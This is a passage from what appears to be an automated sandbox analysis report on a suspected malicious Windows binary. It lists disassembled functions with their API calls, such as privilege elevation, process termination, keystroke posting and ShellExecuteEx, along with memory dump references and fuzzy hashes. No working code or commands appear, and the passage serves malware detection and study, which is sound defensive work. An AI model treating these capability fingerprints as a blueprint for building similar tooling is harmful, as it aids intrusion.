                                          • GetLastError.KERNEL32(00000000), ref: 00E6ED82
                                          • CloseHandle.KERNEL32(00000000), ref: 00E6EDB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 12f7e5b275b4821e7573043c34ebc47d960a711b3c816163f1e61fdea540403f
                                          • Instruction ID: 6472f89567213fd3bd0bca663b116bcbaad1efb1c165a892e98e617b62b1731b
                                          • Opcode Fuzzy Hash: 12f7e5b275b4821e7573043c34ebc47d960a711b3c816163f1e61fdea540403f
                                          • Instruction Fuzzy Hash: 8E41BC712402019FDB20EF24DC95F7EB7E1AF40754F088419F946AB3C2DB75A858CBA2
                                          Function 00E53226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E532C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: caf1bff236912a8932704573cb614573667ea85a1a81b3b2238c8bc62c2373a9
                                          • Instruction ID: 122c745168f9758c246a3909b1bf65cae56283d935ed464cea4b2e800fceab22
                                          • Opcode Fuzzy Hash: caf1bff236912a8932704573cb614573667ea85a1a81b3b2238c8bc62c2373a9
                                          • Instruction Fuzzy Hash: B4112739309746BBE7015A74DC42DFAB3DCEF1A3B5F20242AFD00BA191E7A16B8445B5
                                          Function 00E54534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E5454E
                                          • LoadStringW.USER32(00000000), ref: 00E54555
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E5456B
                                          • LoadStringW.USER32(00000000), ref: 00E54572
                                          • _wprintf.LIBCMT ref: 00E54598
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E545B6
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E54593
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 2b3d369e285513746758b268f54b386eb19d11bf197d1df828022bac9d58607b
                                          • Instruction ID: e2b6417057ec81b4189108e7c72aac19c4633a6c85617286bf1a5159a95fd857
                                          • Opcode Fuzzy Hash: 2b3d369e285513746758b268f54b386eb19d11bf197d1df828022bac9d58607b
                                          • Instruction Fuzzy Hash: 9F014FF2900208BFE750E7E19D89EE6776CE708301F4005A5FB49F2052EA749EC98B70
                                          Function 00E7D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E7D78A
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E7D7AA
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E7D9E5
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E7DA03
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E7DA24
                                          • ShowWindow.USER32(00000003,00000000), ref: 00E7DA43
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E7DA68
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E7DA8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: cf67719f4a92d5544042d766a1987a2480f0e0afa9a6295e3a0fd10142d60a5a
                                          • Instruction ID: 9bb7dc9c01c72ee3b93ace8303f504280a911d4a0ed81845ea418f072d6b9da8
                                          • Opcode Fuzzy Hash: cf67719f4a92d5544042d766a1987a2480f0e0afa9a6295e3a0fd10142d60a5a
                                          • Instruction Fuzzy Hash: E7B1BA31604215EFDF18CF69C985BBD7BB1BF44714F08D069ED88AB295D734A990CB60
                                          Function 00DF2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00DF2ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000,000000FF), ref: 00DF2B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00E2C46A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E2C417,00000004,00000000,00000000,00000000), ref: 00E2C4D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: c061d04569739f8355cf48f42943301649fb2e09d359f983453e0391d4b86dd1
                                          • Instruction ID: dee003a39983f057409a81a402a0833b6c08fac0a5269f5b3590dce57f1e7620
                                          • Opcode Fuzzy Hash: c061d04569739f8355cf48f42943301649fb2e09d359f983453e0391d4b86dd1
                                          • Instruction Fuzzy Hash: 56416F302086889EC7399B3ADCAC77B7BA1EB85314F2EC41DE29793560C635D885D730
                                          Function 00E57368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E5737F
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E573B6
                                          • EnterCriticalSection.KERNEL32(?), ref: 00E573D2
                                          • _memmove.LIBCMT ref: 00E57420
                                          • _memmove.LIBCMT ref: 00E5743D
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00E5744C
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E57461
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E57480
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: abda24cfc6553c3a68177c04134cb06979cc52f76816a2c081c69334ce836ed2
                                          • Instruction ID: 4e6f0b6369bea563302e47850a6edb6f7adf1394f64cd088f24b413bd3319704
                                          • Opcode Fuzzy Hash: abda24cfc6553c3a68177c04134cb06979cc52f76816a2c081c69334ce836ed2
                                          • Instruction Fuzzy Hash: 23317031E04205EFCF10DF65DC85AAE7BB8EF49710B1441A5FE04BB256DB709A94DBA0
                                          Function 00E76442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00E7645A
                                          • GetDC.USER32(00000000), ref: 00E76462
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7646D
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E76479
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E764B5
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E764C6
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E79299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E76500
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E76520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 742eee3703c15510bc798c1894ae29610282ebdac91324499319aeaa53ed824f
                                          • Instruction ID: 26d42ef9abe8cbf8b1115e1b6156d73efba07a4e071597b77a6de4c416c82b8e
                                          • Opcode Fuzzy Hash: 742eee3703c15510bc798c1894ae29610282ebdac91324499319aeaa53ed824f
                                          • Instruction Fuzzy Hash: 8B318D72201610BFEB108F51DC4AFEA3FA9FF09765F044065FE0CAA291D6759C81CBA0
                                          Function 00E4C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 98cb440f5e52143d73f97e05d19b1f95cfd9de11de5352bf9e8e501ec6920ae5
                                          • Instruction ID: e885e5dcda3bc9847994746a77d9529187b2b4eaba030b5a9f81e440473e8ac2
                                          • Opcode Fuzzy Hash: 98cb440f5e52143d73f97e05d19b1f95cfd9de11de5352bf9e8e501ec6920ae5
                                          • Instruction Fuzzy Hash: DE219571703205BBD694B521AD42FFB67ACAF20398F646024FF0DB7282E752DD1182A5
                                          Function 00E5ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • _wcstok.LIBCMT ref: 00E5EEFF
                                          • _wcscpy.LIBCMT ref: 00E5EF8E
                                          • _memset.LIBCMT ref: 00E5EFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 66ac9e6e5d35d0ce9ac78cded79a96fba5ef4883ff364a102fc411e9ccaf71a1
                                          • Instruction ID: 7856fe3f5681d5c9cfc1604bb7923a8394c2d6c2ce73381688a5ba2a4b072db3
                                          • Opcode Fuzzy Hash: 66ac9e6e5d35d0ce9ac78cded79a96fba5ef4883ff364a102fc411e9ccaf71a1
                                          • Instruction Fuzzy Hash: B8C1B7315047049FC714EF24C991AAEB7E0FF84314F05996DF999A72A2DB30ED45CBA2
                                          Function 00DF1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53b1e66b8b65c736585effeb6c08de6fcd33b67a099c75e7cb1e7f18c9fcb819
                                          • Instruction ID: 91e6e2318834ea3ad7dbf45653bb5371d6e92e918990df031fdff28caf6eb35f
                                          • Opcode Fuzzy Hash: 53b1e66b8b65c736585effeb6c08de6fcd33b67a099c75e7cb1e7f18c9fcb819
                                          • Instruction Fuzzy Hash: 0C716834900119EFCB04CF98CC89ABEBBB9FF85314F25C159FA15AA251C730AA51CBB4
                                          Function 00E66E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8101eae4d25df2cf8af3a9b74a889a8452f6520729eb28719dd3b366357a5795
                                          • Instruction ID: 6e10a7162c1f5c174e29cc58c7d2bc8e7f290c76fd64c104aafb1f3142f10aa6
                                          • Opcode Fuzzy Hash: 8101eae4d25df2cf8af3a9b74a889a8452f6520729eb28719dd3b366357a5795
                                          • Instruction Fuzzy Hash: 7E61FE71508304ABC710EB24EC91F6FB7E8EF84758F00991DF685A7292DA71AD44CBB2
                                          Function 00E7B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(017959C8), ref: 00E7B6A5
                                          • IsWindowEnabled.USER32(017959C8), ref: 00E7B6B1
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E7B795
                                          • SendMessageW.USER32(017959C8,000000B0,?,?), ref: 00E7B7CC
                                          • IsDlgButtonChecked.USER32(?,?), ref: 00E7B809
                                          • GetWindowLongW.USER32(017959C8,000000EC), ref: 00E7B82B
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E7B843
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 390c9e903ca1e4dd7d2e552d0ac39e952cfda833248a851bafd57bf886da6868
                                          • Instruction ID: 6c133a71352efabfe9707e5502007b98abf271ca55c8f455aff3c27abaf5afd3
                                          • Opcode Fuzzy Hash: 390c9e903ca1e4dd7d2e552d0ac39e952cfda833248a851bafd57bf886da6868
                                          • Instruction Fuzzy Hash: CB717E34600204AFDB28DFA5C8E5FEA7BB9FF89304F14915AFA49B7261C731A941CB50
                                          Function 00E6F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E6F75C
                                          • _memset.LIBCMT ref: 00E6F825
                                          • ShellExecuteExW.SHELL32(?), ref: 00E6F86A
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • GetProcessId.KERNEL32(00000000), ref: 00E6F8E1
                                          • CloseHandle.KERNEL32(00000000), ref: 00E6F910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 797a6d8d33f136c3f191389b0e55547f229f382c899ce783a303760cd31fcfc4
                                          • Instruction ID: 03bdfe9835fcefea204a8349aafec84c904d28199e9c4217a8e49b3371f9eec0
                                          • Opcode Fuzzy Hash: 797a6d8d33f136c3f191389b0e55547f229f382c899ce783a303760cd31fcfc4
                                          • Instruction Fuzzy Hash: 8D619E75E006199FCB14DF64E490AAEBBF1FF48354B159069E859BB351CB30AD41CFA0
                                          Function 00E5145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00E5149C
                                          • GetKeyboardState.USER32(?), ref: 00E514B1
                                          • SetKeyboardState.USER32(?), ref: 00E51512
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E51540
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E5155F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E515A5
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E515C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: a1a05bf74a18de31887d8c8128ba97d172b7a54a0f858bd8e2e9d82425033330
                                          • Instruction ID: c4c2ac56fbc20488db9062eb473fbae1add15e9e0a506e7ea3c96172636d680f
                                          • Opcode Fuzzy Hash: a1a05bf74a18de31887d8c8128ba97d172b7a54a0f858bd8e2e9d82425033330
                                          • Instruction Fuzzy Hash: 4D51E2A06046D53EFB3252348C45BBA7FE95B4630AF08ADC9E9D5658C2D3E49CCCD750
                                          Function 00E51276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00E512B5
                                          • GetKeyboardState.USER32(?), ref: 00E512CA
                                          • SetKeyboardState.USER32(?), ref: 00E5132B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E51357
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E51374
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E513B8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E513D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 2906d9afd0ac8c4ad9b24b843aeffe0353d8d866561181b924051d7a90c2c581
                                          • Instruction ID: f39b0aede072dbd288bc0ffd9526ce0118a713f5c86d075e4b9943d592a227da
                                          • Opcode Fuzzy Hash: 2906d9afd0ac8c4ad9b24b843aeffe0353d8d866561181b924051d7a90c2c581
                                          • Instruction Fuzzy Hash: 2F5126A05047D53DFB3297248C15B7A7FA95B0630AF08ACC9E9D8668C2D394AC8CE750
                                          Function 00E5589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
